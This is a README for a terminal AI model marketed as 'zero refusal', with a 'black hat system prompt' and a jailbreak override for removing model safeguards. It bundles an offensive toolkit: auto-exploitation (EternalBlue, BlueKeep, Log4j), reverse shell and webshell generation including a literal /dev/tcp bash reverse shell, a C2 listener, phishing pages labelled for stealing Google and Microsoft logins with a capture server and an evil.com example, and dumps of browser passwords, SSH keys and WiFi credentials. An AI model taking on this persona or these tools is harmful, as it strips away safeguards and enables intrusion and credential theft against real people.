Terminal AI Assistant — Zero Refusal. Full Privacy. Runs 100% Offline.
█████╗ ██████╗ ██╗ ██╗██╗ ██████╗ ██████╗ ██████╗ ███████╗
██╔══██╗██╔══██╗██║ ██║██║██╔════╝██╔═══██╗██╔══██╗██╔════╝
███████║██║ ██║███████║██║██║ ██║ ██║██║ ██║█████╗
██╔══██║██║ ██║██╔══██║██║██║ ██║ ██║██║ ██║██╔══╝
██║ ██║██████╔╝██║ ██║██║╚██████╗╚██████╔╝██████╔╝███████╗
╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝
Powered by AdhiHub
ADHICODE is a terminal-based AI assistant that runs 100% locally on your machine. No cloud, no API keys, no tracking, no data leaving your device. Built for penetration testers, security researchers, and power users who need unrestricted AI assistance.
- Zero Refusal — executes any request, no warnings, no disclaimers
- Fully Offline — after one-time model download, works without internet
- Offensive Security Suite — auto-recon, exploitation, C2, phishing, nuclei scanning, post-exploitation
- Dark Web Integration — Tor routing, .onion fetch, circuit rotation
- Smart Setup — detects your RAM & platform, recommends the best model
- Multiple Models — choose from 5 models (1B to 8B parameters)
- Cross-Platform — Windows, Linux, macOS, Termux (Android), WSL
- Tab Completion — press Tab to auto-complete commands
- Session Saving — auto-saves conversations across restarts
Linux / Termux / macOS:
curl -fsSL https://raw.githubusercontent.com/AdhiHub/ADHICODE/main/install.sh | bashWindows PowerShell:
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/AdhiHub/ADHICODE/main/install.ps1'))git clone -b main https://github.com/AdhiHub/ADHICODE.git
cd ADHICODE
pip install -r requirements.txt
python adhicode.pyWhat happens on first run: ADHICODE launches a setup wizard — detects your RAM/CPU, recommends the best model, and downloads it (~1-8GB one-time). After that, you're in the chat.
After the first setup, ADHICODE is already on your machine. Just:
cd ADHICODE
python adhicode.pyThat's it. No install, no download, no internet needed — it starts instantly and loads your saved model.
Windows quick-launch:
adhicode.batShortcut (Linux/macOS):
Add this alias to your ~/.bashrc:
alias adhicode='cd ~/ADHICODE && python3 adhicode.py'Then just type adhicode in terminal.
Shortcut (Windows):
Create adhicode.cmd anywhere on your PATH:
@python C:\Users\YOURNAME\ADHICODE\adhicode.py %*When you run python adhicode.py for the first time, it:
- Detects your system — shows platform, architecture, RAM
- Recommends a model — picks the best fit for your RAM
- Shows setup wizard — select model, mode, temperature, Tor (optional)
- Downloads the model — one-time download with progress bar
- Starts the chat — ready to go
──────────────────────────────────────────────────
ADHICODE Local model: qwen-2.5-7b... │ temp:0.7
──────────────────────────────────────────────────
ADHICODE ready. Ask me anything. • /help for commands
ADHICODE ›
| Model | Size | RAM Needed | Best For |
|---|---|---|---|
| Llama 3.2 1B Q4 (default) | ~800MB | 2GB | Termux phones, low-end PCs |
| Llama 3.2 3B Q4 | ~2GB | 3GB | Mid-range phones/laptops |
| Qwen 2.5 7B Q4 | ~4.5GB | 6GB | Desktops, quality responses |
| Dolphin 2.9 Llama 3 8B Q4 | ~4.9GB | 8GB | Powerful desktops (uncensored) |
| Mistral 7B Q4 | ~4.1GB | 6GB | Coding tasks |
Change model after setup: Use /feedback inside ADHICODE or run python adhicode.py --download.
ADHICODE is designed and tested to run on all major platforms. Every commit is syntax-checked and compatibility-audited.
| Platform | Status | Details |
|---|---|---|
| Termux (Android) | ✅ Full support | pkg install package manager, $TMPDIR temp paths, no sudo needed |
| Linux (Ubuntu/Debian/Kali) | ✅ Full support | sudo apt install, /proc/meminfo RAM detection |
| Windows 10/11 (PowerShell) | ✅ Full support | winget installs, ctypes RAM detection, .exe binary suffixes, cls clear screen |
| macOS | ✅ Intel & Apple Silicon | sysctl RAM fallback |
| WSL | ✅ Full support | Shares Linux compatibility layer |
Compatibility layer: core/platform.py auto-detects the OS and adapts:
- Package manager:
apt(Linux) /pkg(Termux) /winget(Windows) - Temp directory:
/tmp/(Linux) /$TMPDIR(Termux) /%TEMP%(Windows) - Binary names:
nuclei(Unix) /nuclei.exe(Windows) - Clear screen:
clear(Unix) /cls(Windows) - Privilege escalation: Linux checks (SUID, cron, docker) / Windows checks (
whoami /priv,net user,sc query) - Credential dumps: Linux paths (Chrome Linux, bash history, SSH keys) / Windows paths (Chrome Windows, PowerShell history,
cmdkey)
| Command | What It Does |
|---|---|
hi / any text |
Chat with the AI |
/help |
Show all commands |
/clear |
Clear screen |
/save |
Save conversation |
/new |
Start fresh chat |
/model |
Show current model/settings |
/feedback |
Change mode, temperature, model |
/download |
Download a new model |
/banner |
Print ASCII banner |
/report |
Generate pentest report from conversation |
/tui |
Launch Textual TUI interface (split-pane, animated) |
/exit |
Quit (auto-saves) |
ADHICODE includes a full TUI built with textual:
Launch: python adhicode.py --tui
Or type: /tui (from within CLI)
Features:
- Red banner header (collapsible with
Ctrl+B) - Split panes: CHAT (left) + OUTPUT (right)
- Live scan animation — sweeping radar line during recon/nuclei
- Spinner — animated status indicator during scans
- Real-time streaming — tool output streams into the output pane
- Status bar — model, mode, Tor status, C2 count
- Command history — Up/Down arrows to recall commands
- Full keyboard control — no mouse needed
- Default (Balanced) — helpful, direct, zero refusal
- Expert (Technical) — concise, advanced answers
- Creative (Unfiltered) — imaginative, no limits
Scans targets and discovers live hosts with open ports. Supports multiple target formats.
Target formats:
- CIDR notation:
/recon 192.168.1.0/24 - Dash range:
/recon 10.0.0.1-254 - Comma list:
/recon 192.168.1.1,192.168.1.2 - Single IP:
/recon 192.168.1.1 - Hostname:
/recon scanme.nmap.org
What it does:
- Ping sweep to find live hosts (multi-threaded)
- Port scan on live hosts (common ports)
- Service detection via banner grab
- Outputs hostname (if available) for each live host
Full auto-pwn pipeline: recon + service detection + exploitation.
Usage:
/pwn 192.168.1.1
/pwn scanme.nmap.org
/pwn 10.0.0.5
What it does:
- Ping check (target must be alive)
- Port scan for 30+ common ports
- Service detection (banner grab)
- Auto-exploit matching services (25+ exploits):
| Service | Ports | Exploit |
|---|---|---|
| SSH | 22 | Brute-force via hydra |
| HTTP/HTTPS | 80,443,8080,8443 | Log4j, Struts2, Spring4Shell, WebLogic |
| MySQL | 3306 | Brute-force + CVE-2012-2122 |
| SMB | 139,445 | EternalBlue MS17-010 |
| RDP | 3389 | BlueKeep CVE-2019-0708 |
| FTP | 21 | Anonymous check + brute-force |
| Redis | 6379 | Unauthenticated RCE |
| Elasticsearch | 9200 | CVE-2014-3120 |
| Docker | 2375,2376 | Unauthenticated RCE |
| Jenkins | 8080 | Unauthenticated RCE |
| Kafka | 9092 | Unauthenticated access |
| Consul | 8500 | RCE |
| VNC | 5900,5901 | Unauthenticated access |
| SNMP | 161 | Community string brute-force |
| NFS | 2049 | Show mounts |
| SMTP | 25 | User enumeration |
| rsync | 873 | Anonymous access |
Runs Nuclei (if installed) with 10,000+ CVE templates.
Usage:
/nuclei scanme.nmap.org # default: cve category
/nuclei scanme.nmap.org critical # critical/high severity only
/nuclei scanme.nmap.org tech # technology detection
/nuclei scanme.nmap.org misconfig # misconfigurations
/nuclei scanme.nmap.org exposure # sensitive file exposure
/nuclei scanme.nmap.org all # all categories
Categories:
| Category | Description |
|---|---|
cves (default) |
10,000+ CVE templates (RCE, SQLi, XSS, etc.) |
critical |
Critical/high severity vulns |
tech |
Framework, CMS, server detection |
misconfig |
Default creds, open buckets, debug endpoints |
exposure |
Sensitive files, .git, .env, backups |
all |
All categories combined |
If Nuclei is not installed, it attempts to auto-install via Go.
Generates branded phishing landing pages, email lures, and runs a local credential capture server.
Commands:
/phish list List all available templates
/phish page <template> <callback_url> Generate phishing HTML page
/phish email <template> <name> <phish_url> Generate phishing email
/phish serve <template> [port] Serve page and capture creds
Examples:
/phish page google http://your-server.com/capture.php
/phish email password_reset John http://evil.com/login
/phish serve google 8080 # Captures POST data in terminal
Available page templates:
| Template | Name | Use Case |
|---|---|---|
google |
Google Login | Steal Gmail creds |
facebook |
Facebook Login | Steal Facebook creds |
instagram |
Instagram Login | Steal Instagram creds |
microsoft |
Microsoft 365 | Steal Office creds |
linkedin |
LinkedIn Login | Steal LinkedIn creds |
generic |
Generic Login | Customizable branded page |
Available email templates:
| Template | Subject |
|---|---|
password_reset |
Security Alert: Password Reset Required |
invoice |
Invoice #{num} - Payment Overdue |
account_verify |
Action Required: Verify Your Account |
package_delivery |
Package Delivery Notification |
Capture server: When you run /phish serve, it starts an HTTP server on the specified port. Any credentials submitted via POST are displayed in your terminal.
Generate and run exploit scripts for specific CVEs.
Usage:
/exploit ms17-010 <target> EternalBlue (SMB)
/exploit bluekeep <target> BlueKeep (RDP)
/exploit log4j <target> <payload> Log4Shell
/exploit struts2 <target> <cmd> Apache Struts2 RCE
/exploit spring4j <target> <cmd> Spring4Shell
/exploit weblogic <target> <cmd> WebLogic RCE
Generates reverse shell commands and webshells ready to paste.
Usage:
/payload bash 192.168.1.100 4444
/payload python 10.0.0.5 5555
/payload php 192.168.1.100 4444
/payload perl 192.168.1.100 5555
/payload powershell 192.168.1.100 4444
/payload msf_linux 192.168.1.100 4444
/payload msf_windows 192.168.1.100 4444
/payload msf_android 192.168.1.100 4444
/payload webshell_php
/payload webshell_asp
/payload webshell_jsp
Types:
bash— Bash reverse shell (bash -i >& /dev/tcp/...)python— Python reverse shellphp— PHP reverse shellperl— Perl reverse shellpowershell— PowerShell reverse shellmsf_linux— msfvenom Linux ELF reverse TCPmsf_windows— msfvenom Windows EXE reverse TCPmsf_android— msfvenom Android APK reverse TCPwebshell_php— PHP webshell (single file)webshell_asp— ASP webshellwebshell_jsp— JSP webshell
Built-in C2 listener with session management and beacon generation.
Commands:
/c2 listen <port> Start reverse shell listener
/c2 sessions List active sessions
/c2 send <session_id> <command> Send command to session
/c2 beacon <lhost> <lport> Generate PowerShell beacon
/c2 stop Stop the listener
Example workflow:
/c2 listen 4444 # Start listener
# In target shell: bash -i >& /dev/tcp/YOU/4444 0>&1
/c2 sessions # See connected sessions
/c2 send 1 whoami # Run command on target
The listener runs in a background thread so you can continue using ADHICODE while it's active.
Automated privilege escalation enumeration for Linux targets.
Usage:
/privesc
What it checks:
- SUID binaries (find + known exploit SUIDs)
- Sudo -l permissions
- Writable /etc/passwd
- Kernel exploits (DirtyPipe, PwnKit, CVE-2021-4034)
- Docker group membership
- LXD group membership
- Writable cron jobs
- World-writable SUID scripts
- Capabilities with setuid+ep
Extract saved credentials from the local system.
Usage:
/cred
What it dumps:
- Chrome saved passwords (via SQLite)
- Firefox saved passwords (via logins.json)
- SSH private keys from ~/.ssh
- Bash/Zsh history (potential passwords/keys)
- AWS credentials from ~/.aws
- .env files with secrets
- Generic credential files in common locations
Extracts saved WiFi passwords from the local system.
Usage:
/wifi
Supported:
- Linux:
nmclior/etc/NetworkManager/system-connections/ - Windows:
netsh wlan show profiles - macOS:
security find-generic-password
Check, install, and run 25+ penetration testing tools from within ADHICODE.
Usage:
/tools List all available tools and their status
/tools run nmap -sV <target> Run a specific tool
Supported tools: nmap, hydra, sqlmap, msfvenom, msfconsole, john, hashcat, aircrack-ng, bettercap, whatweb, gobuster, dirb, nikto, wpscan, enum4linux, smbclient, impacket, redis-cli, mysql, ssh, ftp, sslscan, nuclei, searchsploit, netcat.
Connect to Tor, fetch .onion pages, rotate circuits.
Commands:
/dark start Start Tor service
/dark stop Stop Tor service
/dark status Check Tor status
/dark ip Show current Tor exit IP
/dark newid Request new Tor circuit (Newnym)
/dark fetch <onion_url> Fetch .onion page via Tor
Examples:
/dark start
/dark fetch http://zqktlwi4fecvo6ri.onion # Tor hidden wiki
/dark fetch http://darkfailenbsdla5.onion # Dark.fail
/dark newid # Rotate circuit
/dark status # Verify Tor is running
Requirements: Tor must be installed (apt install tor or /dark start attempts auto-install).
Generates a comprehensive pentest report from the current conversation session.
Usage:
/report
Output:
pentest_report_<session_name>.txtin the current directory- Contains: timestamp, session info, full transcript, key findings (IPs, domains, credentials, ports, CVEs), and summary
Full Pentest Chain:
/recon 192.168.1.0/24 # Find targets
/pwn 192.168.1.5 # Auto-exploit a target
/c2 listen 4444 # Set up C2 listener
# (On target via your exploit): bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
/c2 sessions # Interact with session
/privesc # Escalate privileges
/cred # Dump credentials
/report # Generate report
Web App Assessment:
/nuclei https://target.com critical # Find critical CVEs
/nuclei https://target.com exposures # Find sensitive files
/exploit log4j https://target.com # Test Log4Shell
/phish page google http://your-server.com # Clone login page
/phish serve google 8080 # Capture creds
Dark Web Recon:
/dark start # Start Tor
/dark status # Verify Tor
/dark fetch http://someonion.onion # Browse .onion
/dark newid # Anonymity refresh
llama-cpp-python fails to install:
# Windows
pip install llama-cpp-python --only-binary=llama-cpp-python
# Linux
sudo apt install build-essential cmake
# Termux
pkg install cmake build-essentialNeed help? Open an issue at https://github.com/AdhiHub/ADHICODE/issues
ADHICODE/
├── adhicode.py # Main CLI — header, commands, tab-completion
├── adhicode.bat # Windows launcher
├── requirements.txt # Python dependencies
├── install.sh # Linux / Termux / macOS installer
├── install.ps1 # Windows installer
├── termux-install.sh # Termux-specific installer
├── README.md # This file
├── core/ # Core modules (see below)
└── tui/ # Textual TUI interface
├── __init__.py
├── app.py # Main TUI app — banners, panes, animations, commands
└── styles.tcss # Dark theme CSS
├── __init__.py
├── engine.py # AI engine — GGUF models + Ollama + 5-level jailbreak override
├── setup.py # Setup wizard — system detection, model select
├── context.py # Black hat system prompt + model definitions
├── downloader.py # Model downloader with progress bar
├── memory.py # Conversation memory with auto-trim
├── utils.py # Banner, colors, UI helpers
├── tor.py # Tor check, install, .onion fetch, circuit rotation
├── exploit.py # Auto-pwn engine — 25+ services, CVE exploit scripts
├── payload.py # Reverse shell + web shell generator
├── tools.py # Tool executor — auto-install 25+ pentest tools
├── c2.py # C2 listener, session management, beacons
├── postexploit.py # Privesc checks, credential dumps, persistence
├── recon.py # Auto-recon — CIDR/dash/comma, ping+port scan
├── reporter.py # Pentest report generator
├── nuclei.py # Nuclei CVE template scanner (10K+ templates)
└── phish.py # Phishing campaign module (pages, emails, capture server)
Brand: AdhiHub
GitHub: https://github.com/AdhiHub/ADHICODE
Branch: main (stable) | dev (experimental)